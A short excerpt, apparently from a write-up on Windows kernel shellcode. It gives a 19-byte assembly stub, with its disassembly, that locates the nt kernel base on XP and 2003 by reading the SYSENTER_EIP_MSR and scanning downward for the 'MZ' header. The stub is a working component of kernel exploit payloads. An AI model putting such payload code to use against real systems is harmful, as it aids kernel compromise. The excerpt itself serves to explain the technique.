|
Size: |
19 bytes |
Compat: |
XP, 2003 (modern processors only) |
For processors that support the system call MSR 0x176
(SYSENTER_EIP_MSR), the base address of nt can
be found by reading the registered system call handler and then
using the scandown technique to find the base address. The
following disassembly illustrates how this can be accomplished:
00000000 6A76 push byte +0x76
00000002 59 pop ecx
00000003 FEC5 inc ch
00000005 0F32 rdmsr
00000007 662501F0 and ax,0xf001
0000000B 48 dec eax
0000000C 6681384D5A cmp word [eax],0x5a4d
00000011 75F4 jnz 0x7
|